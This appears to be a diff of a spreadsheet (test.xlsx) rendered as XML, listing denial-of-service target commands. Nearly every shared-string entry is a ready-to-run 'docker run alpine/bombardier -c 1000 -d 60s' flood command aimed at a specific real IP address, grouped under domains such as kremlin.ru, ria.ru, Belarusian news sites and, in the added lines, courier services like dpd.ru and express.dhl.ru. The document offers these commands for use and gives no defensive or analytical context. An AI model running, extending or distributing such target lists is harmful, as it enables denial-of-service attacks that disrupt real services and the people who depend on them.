+      <c r="A621" s="3"/>
+      <c r="B621" s="3"/>
+      <c r="C621" s="3"/>
+      <c r="D621" s="3"/>
+      <c r="E621" s="3"/>
+    </row>
+    <row r="622" ht="15.35" customHeight="1">
+      <c r="A622" s="3"/>
+      <c r="B622" s="3"/>
+      <c r="C622" s="3"/>
+      <c r="D622" s="3"/>
+      <c r="E622" s="3"/>
+    </row>
+    <row r="623" ht="15.35" customHeight="1">
+      <c r="A623" s="3"/>
+      <c r="B623" s="3"/>
+      <c r="C623" s="3"/>
+      <c r="D623" s="3"/>
+      <c r="E623" s="3"/>
+    </row>
+    <row r="624" ht="15.35" customHeight="1">
+      <c r="A624" s="3"/>
+      <c r="B624" s="3"/>
+      <c r="C624" s="3"/>
+      <c r="D624" s="3"/>
+      <c r="E624" s="3"/>
+    </row>
+    <row r="625" ht="15.35" customHeight="1">
+      <c r="A625" s="3"/>
+      <c r="B625" s="3"/>
+      <c r="C625" s="3"/>
+      <c r="D625" s="3"/>
+      <c r="E625" s="3"/>
+    </row>
+    <row r="626" ht="15.35" customHeight="1">
+      <c r="A626" s="3"/>
+      <c r="B626" s="3"/>
+      <c r="C626" s="3"/>
+      <c r="D626" s="3"/>
+      <c r="E626" s="3"/>
+    </row>
+    <row r="627" ht="15.35" customHeight="1">
+      <c r="A627" s="3"/>
+      <c r="B627" s="3"/>
+      <c r="C627" s="3"/>
+      <c r="D627" s="3"/>
+      <c r="E627" s="3"/>
+    </row>
+    <row r="628" ht="15.35" customHeight="1">
+      <c r="A628" s="3"/>
+      <c r="B628" s="3"/>
+      <c r="C628" s="3"/>
+      <c r="D628" s="3"/>
+      <c r="E628" s="3"/>
+    </row>
+    <row r="629" ht="15.35" customHeight="1">
+      <c r="A629" s="3"/>
+      <c r="B629" s="3"/>
+      <c r="C629" s="3"/>
+      <c r="D629" s="3"/>
+      <c r="E629" s="3"/>
+    </row>
+    <row r="630" ht="15.35" customHeight="1">
+      <c r="A630" s="3"/>
+      <c r="B630" s="3"/>
+      <c r="C630" s="3"/>
+      <c r="D630" s="3"/>
+      <c r="E630" s="3"/>
+    </row>
+    <row r="631" ht="15.35" customHeight="1">
+      <c r="A631" s="3"/>
+      <c r="B631" s="3"/>
+      <c r="C631" s="3"/>
+      <c r="D631" s="3"/>
+      <c r="E631" s="3"/>
+    </row>
+    <row r="632" ht="15.35" customHeight="1">
+      <c r="A632" s="3"/>
+      <c r="B632" s="3"/>
+      <c r="C632" s="3"/>
+      <c r="D632" s="3"/>
+      <c r="E632" s="3"/>
+    </row>
+    <row r="633" ht="15.35" customHeight="1">
+      <c r="A633" s="3"/>
+      <c r="B633" s="3"/>
+      <c r="C633" s="3"/>
+      <c r="D633" s="3"/>
+      <c r="E633" s="3"/>
+    </row>
+    <row r="634" ht="15.35" customHeight="1">
+      <c r="A634" s="3"/>
+      <c r="B634" s="3"/>
+      <c r="C634" s="3"/>
+      <c r="D634" s="3"/>
+      <c r="E634" s="3"/>
+    </row>
+    <row r="635" ht="15.35" customHeight="1">
+      <c r="A635" s="3"/>
+      <c r="B635" s="3"/>
+      <c r="C635" s="3"/>
+      <c r="D635" s="3"/>
+      <c r="E635" s="3"/>
+    </row>
+    <row r="636" ht="15.35" customHeight="1">
+      <c r="A636" s="3"/>
+      <c r="B636" s="3"/>
+      <c r="C636" s="3"/>
+      <c r="D636" s="3"/>
+      <c r="E636" s="3"/>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,666 +11,105 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="332">
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.70&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>95.173.136.70</t>
-  </si>
-  <si>
-    <t>kremlin.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.136.76&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>95.173.136.76</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.125&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.125</t>
-  </si>
-  <si>
-    <t>ria.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.124&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.124</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.231&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.231</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.221&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.221</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.236.20&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.236.20</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.230&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.230</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.223&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.223</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.39&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.39</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.13&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.13</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.94&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.94</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.233.32&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.233.32</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.233.136&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.233.136</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.233.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.233.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 167.71.49.77&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>167.71.49.77</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.99&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.99</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.46&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.46</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.218&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.218</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.50&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.50</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.134&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.134</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.22&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.22</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.198&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.198</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.135&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.135</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.81&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.81</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.176&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.176</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.243&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.232.243</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.43&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.43</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.143&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.143</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.235.75&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.235.75</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.237.136&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.237.136</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.237.18&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.237.18</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.235.243&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.235.243</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.114&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.114</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.128&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.128</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.122&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.122</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.23&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.23</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.150&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.150</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.80&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.80</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.64&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.64</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.249&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.249</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.90&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.90</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.177&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.177</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.247.88&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.247.88</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.126&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.126</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.246.217&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.246.217</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.100.180.180&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>94.100.180.180</t>
-  </si>
-  <si>
-    <t>news.mail.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.139.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>217.69.139.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.139.35&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>217.69.139.35</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.139.36&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>217.69.139.36</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.163.61.132&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>95.163.61.132</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.163.61.130&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>95.163.61.130</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.163.61.134&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>95.163.61.134</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.84.119.236&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.84.119.236</t>
-  </si>
-  <si>
-    <t>kp.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.232.92.25&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>193.232.92.25</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.17.56.12&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>37.17.56.12</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.138.155&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.124.138.155</t>
-  </si>
-  <si>
-    <t>ctv.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.98.164.233&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.98.164.233</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.138.154&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.124.138.154</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.138.24&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.124.138.24</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 138.68.75.50&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>138.68.75.50</t>
-  </si>
-  <si>
-    <t>21.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.253.115.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>172.253.115.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.27&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>64.233.184.27</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.233.184.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>64.233.184.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.27&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>209.85.202.27</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 209.85.202.26&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>209.85.202.26</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.0.170.23&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>193.0.170.23</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.245.59.194&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>173.245.59.194</t>
-  </si>
-  <si>
-    <t>ej.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.192.107&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>108.162.192.107</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.88.21.249&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>77.88.21.249</t>
-  </si>
-  <si>
-    <t>grozny.tv</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.129.100.200&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.129.100.200</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.170.100&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>186.2.170.100</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.45&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.178.208.45</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.60.110&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>104.21.60.110</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.188.109.70&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>89.188.109.70</t>
-  </si>
-  <si>
-    <t>grozny-inform.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.241.116.117&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.241.116.117</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.159.233.17&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>85.159.233.17</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.165.223.182&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>46.165.223.182</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.59.1.205&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>108.59.1.205</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.163.112&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>186.2.163.112</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.189.182.182&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>90.189.182.182</t>
-  </si>
-  <si>
-    <t>ngrz.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.58.117.18&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>194.58.117.18</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 144.76.167.14&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>144.76.167.14</t>
-  </si>
-  <si>
-    <t>chechnyatoday.com</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.177&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.178.208.177</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.249.83.165&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>80.249.83.165</t>
-  </si>
-  <si>
-    <t>dpd.by</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.20.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.217.20.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.217.21.1&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.217.21.1</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.66.69.19&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.66.69.19</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.40.2.9&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>188.40.2.9</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.172.201.84&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.172.201.84</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.127&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.127</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.67&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.67</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.57&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.57</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.84&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.84</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.73&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.73</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.44&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.44</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.72&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.72</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.99.71&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.99.71</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 198.54.126.25&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>198.54.126.25</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.209.148.74&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>85.209.148.74</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.84.119.237&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.84.119.237</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 167.71.55.106&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>167.71.55.106</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 52.128.23.153&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>52.128.23.153</t>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="140">
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.206.216.121&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.206.216.121</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="12"/>
+        <color indexed="11"/>
+        <rFont val="Calibri"/>
+      </rPr>
+      <t>ponyexpress.ru</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.32.57.158&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.32.57.158</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.206.217.30&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.206.217.30</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.73.60.2&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>217.73.60.2</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="12"/>
+        <color indexed="11"/>
+        <rFont val="Calibri"/>
+      </rPr>
+      <t>express.dhl.ru</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.6&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.6</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="12"/>
+        <color indexed="11"/>
+        <rFont val="Calibri"/>
+      </rPr>
+      <t>dpd.ru</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.43.147.90&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>77.43.147.90</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.9&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.9</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.233&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.233</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.143.8.107&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>37.143.8.107</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 88.99.94.22&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>88.99.94.22</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.24&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.209.80.24</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.72&amp;&amp; sleep 5;</t>
@@ -685,328 +124,361 @@
     <t>91.209.80.73</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.102.136.180&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>34.102.136.180</t>
-  </si>
-  <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.209.80.7&amp;&amp; sleep 5;</t>
   </si>
   <si>
     <t>91.209.80.7</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 205.178.189.131&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>205.178.189.131</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.125.23.56&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>93.125.23.56</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.3&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>149.232.252.3</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.124.193.27&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.124.193.27</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 149.232.252.19&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>149.232.252.19</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.155.60.4&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>45.155.60.4</t>
-  </si>
-  <si>
